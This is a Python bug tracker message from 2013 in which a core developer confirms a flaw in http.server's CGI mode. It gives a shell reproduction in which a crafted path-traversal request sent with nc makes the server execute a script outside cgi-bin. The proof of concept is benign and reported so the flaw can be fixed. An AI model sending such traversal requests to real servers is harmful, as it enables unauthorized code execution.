Message201647
| Author |
christian.heimes |
| Recipients |
Alexander.Kruppa, benjamin.peterson, christian.heimes, georg.brandl, larry, vstinner |
| Date |
2013年10月29日.16:48:39 |
| SpamBayes Score |
-1.0 |
| Marked as misclassified |
Yes |
| Message-id |
<1383065320.2.0.995297367448.issue19435@psf.upfronthosting.co.za> |
| In-reply-to |
| Content |
I can confirm the issue:
$ mkdir www
$ cd www
$ cat << EOF > badscript.sh
#!/bin/sh
echo hacked
EOF
$ chmod +x badscript.sh
$ ../python -m http.server --cgi
$ echo "GET ///////////badscript.sh/../cgi-bin/cgi.sh HTTP/1.1" | nc localhost 8000
HTTP/1.0 200 Script output follows
Server: SimpleHTTP/0.6 Python/3.4.0a4+
Date: 2013年10月29日 16:47:22 GMT
hacked |
|